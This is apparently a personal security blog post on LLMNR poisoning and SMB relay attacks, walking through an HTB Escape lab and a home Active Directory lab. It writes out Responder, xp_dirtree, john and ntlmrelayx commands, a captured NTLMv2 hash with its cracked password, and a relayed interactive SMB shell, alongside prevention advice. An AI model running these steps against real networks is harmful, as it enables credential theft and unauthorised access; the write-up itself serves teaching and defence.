Skip to main content
  1. Posts/

LLMNR Poisoning & SMB Relay Attacks

·9 mins
active-directory
Table of Contents

What is LLMNR?
#

LLMNR (Link-Local Multicast Name Resolution) is one of multiple local host resolution protocols. These protocols are based on the DNS packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same internal network.

Lots of Microsoft operating systems use LLMNR for name resolution when the DNS fails, but this has been slowly being phased out in favor of mDNS (Mutual DNS).

You might use LLMNR to get the desired IP for a network drive by asking the DNS where the resource is and if the network has another machine that knows where that resource is, you can try to authenticate to it.

What is LLMNR Poisoning?
#

This behavior can be exploited in the event that the user isn’t connected to the network or if they mistype the name of the resource they are looking for. Those actions would trigger an LLMNR interaction where an attacker can pretend to know the location of the resource, leading the user to try and authenticate to the attacker-controlled server.

llmnr-1

This attack primarily exploits the trust that a computer gives when sending queries to all the other hosts on the network.

The most popular tools for actually pulling of this attack and other like it is called Responder and it is pretty straightforward to use. Let’s go through an example.

Example - HTB Escape
#

This machine starts out with an SMB share that has instructions on how to interact with their MSSQL server. We can log in with those credentials and look around the service:

╰─ impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)>

We can’t run many commands on this server and there isn’t anything interesting on the shares, but we can use the xp_dirtree command to try and reach out to our machine. The IP won’t be in the local DNS so the machine will default to using LLMNR which will make the service account try to use their credentials to authenticate to our machine.

We start our Responder interface like this, using tun0 because that is the VPN network we are trying this on:

╰─ sudo responder -I tun0

Then, once we run the following on the SQL server:

SQL (PublicUser  guest@master)> EXEC xp_dirtree '\\10.10.14.171\share'

We get an authentication request in Responder:

[SMB] NTLMv2-SSP Client   : 10.129.245.209
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:fc4fa2a821fa70ea:4D4D2176B1860A03C08E3DD365C3495A:0101000000000000003A9E53F593DA0153F96DEDE0BB6D8A00000000020008004A0033005400470001001E00570049004E002D004400390037004400590037004600480053005300420004003400570049004E002D00440039003700440059003700460048005300530042002E004A003300540047002E004C004F00430041004C00030014004A003300540047002E004C004F00430041004C00050014004A003300540047002E004C004F00430041004C0007000800003A9E53F593DA0106000400020000000800300030000000000000000000000000300000903BB926AD7B0560AF55C682BF86D18C6B12355D1F2756545ACA0250947018200A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100370031000000000000000000

We can then try and crack this hash using hashcat or john:

╰─ john hash -w=/home/kali/Desktop/Useful-Misc./rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc)     
1g 0:00:00:03 DONE (2024-04-21 14:15) 0.2583g/s 2765Kp/s 2765Kc/s 2765KC/s RENZOJAVIER..REDMAN69
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

As long as you can initiate some kind of authenticated request to your machine you should be able to get this to work, assuming that LLMNR is being used.

LLMNR Poisoning Prevention
#

The primary defense here is to disable LLMNR and NBT-NS if possible. Of course this isn’t always possible in all organizations, and in that case you could require network access control or require strong enough passwords that they would be less feasible to be cracked. Just keep in mind that string passwords don’t prevent a hash being used to authenticate to services where it is enabled.

What is SMB?
#

Server Message Block (SMB) is designed for regulating access to files, directories, printers, and other similar resources available over the network. The most common implementation of this is in the form of network shares, which is just a file system accessible from multiple users within the internal network.

The two most common ports you will see this on are 139 and 445. Port 139 is typically identified as NetBIOS (Network Basic Input Output System) and it allows systems on the internal network to transmit data mostly in the context of identifying the location of resources using their NetBIOS name. Port 445 is most often the SMB shares we mentioned, and while it doesn’t need to have NetBIOS to function they are often seen together.

Let’s walk through an execution path for this application:

  • The client and server establish a NetBIOS session and negotiate the SMB version/dialect.
  • The client authenticates to the resource with their credentials.
    • This can often be configured to use NTLM authentication.
  • The client connects to that shared resource and depending on their permissions, accesses files on that drive.

What is an SMB Relay Attack?
#

When a user is trying to access a shared resource, SMB initiates a connection that authenticates the user - attackers on the network can capture this authentication attempt and relay it to another server to impersonate the user. There are some important caveats to consider in the form of requirements:

  • SMB signing must be disabled (this is the default setting on Windows workstations).
  • Access to another machine on the network(this is because you can’t relay credentials to the same machine).

So in order for you to pull off this attack you need access to multiple machines on the same network and you likely want the victim user to have local admin privileges on their machine. The local admin privileges make it more possible that you can authenticate to another system.

Example - AD Lab Example
#

I’ve got an active directory lab set up following the TCM PEH course guide instructions. We have two victim machines where one has a user with local admin access and the other does not.

The attack goes like this:

  • We scan the internal network and identify some hosts that have SMB signing disabled or not required.
  • We set up responder to impersonate an accessible resource on the domain.
  • We set up ntlmrelayx to relay the authentication information to another windows host.
  • Wait for a user to trigger some kind of interaction that reaches out to our server and use the relayed credentials.

The network and attack overview looks something like this, we do need to be inside the network as this is an internal attack:

llmnr-2

So, first we run our internal port scan to identify hosts:

└─$ sudo nmap 192.168.113.0-255
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-21 16:31 EDT
Nmap scan report for 192.168.113.1
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.113.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.113.128
Host is up (0.00016s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5357/tcp open  wsdapi
MAC Address: 00:0C:29:93:B0:1E (VMware)

Nmap scan report for 192.168.113.130
Host is up (0.00018s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:22:81:6F (VMware)

Nmap scan report for 192.168.113.131
Host is up (0.00017s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:2F:DD:A6 (VMware)

We can map out that there are workstation hosts on 192.168.113.131 and 192.168.113.130 and a DC on 192.168.113.128.

We can scan to see if signing is disabled or required:

└─$ nmap --script=smb2-security-mode.nse -p 445 -Pn --open 192.168.113.0-255

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-21 16:59 EDT
Nmap scan report for 192.168.113.128
Host is up (0.0013s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Nmap scan report for 192.168.113.130
Host is up (0.00040s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Nmap scan report for 192.168.113.131
Host is up (0.0048s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Nmap done: 256 IP addresses (256 hosts up) scanned in 2.83 seconds

We can see that the DC isn’t vulnerable but the to workstations should be, which makes sense because that is the default configuration for both.

Next we can start up responder, making sure to turn off SMB and HTTP in the config file:

└─$ sudo responder -I eth0

We can also start ntlmrelayx, where I have it set to target the two workstations via a targets.txt file. We also need to enable SMB support and I have -i enabled to give us an interactive shell on one of our ports:

└─$ impacket-ntlmrelayx -tf targets.txt -smb2support -i
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections

Instead of waiting for some chance interaction, we can just go onto one of the workstations (the one with local admin) and try to authenticate to the attacker machine as if it were a network share:

llmnr-3

Then on our responder we see the traffic come through and in ntlmrelayx we see the following:

---SNIP---
[*] Received connection from MARVEL/fcastle at THEPUNISHER, connection will be relayed after re-authentication
[*] SMBD-Thread-5 (process_request_thread): Connection from MARVEL/FCASTLE@192.168.113.131 controlled, attacking target smb://192.168.113.130
[*] Authenticating against smb://192.168.113.130 as MARVEL/FCASTLE SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
---SNIP---

So we got an incoming connection from the host with local admin (ending in .131) and we relayed the authentication information to the other workstation (at .130) and we can access it at port 11000 on our machine:

└─$ nc 127.0.0.1 11000
Type help for list of commands
# info
Version Major: 10
Version Minor: 0
Server Name: SPIDERMAN
Server Comment: 
Server UserPath: c:\
Simultaneous Users: 20
#

From here we can directly interact with the various shares on the other workstation machine (called SPIDERMAN) and we can download and upload files.

SMB Relay Attack Prevention
#

You can always enable SMB signing on all devices, but this will likely cause some performance issues with file copies and legacy devices using older versions of SMB. If this initial approach isn’t viable for the environment, then it would be better to restrict local admin accounts and to utilize account tiering so that a typical user account doesn’t have admin permissions.

Related

IPv6 MITM & Passback Attacks
·5 mins
active-directory
IPv6 DNS Takeover # Another internal attack vector we should keep in mind has to do with IPv6 and how it is configured with DHCP.
Felonious Forums - HTB Web Challenge
·4 mins
web htb
In this challenge we are greeted with a web page: Let’s go ahead and make an account and very quickly we can observe that we are able to make and post threads with markdown content.
Burp Suite Certified Practitioner Exam Review
·5 mins
BSCP web
Introduction # To preface this post, I want to briefly describe my level of experience to help others who might take this exam better benchmark how long it might take them to study.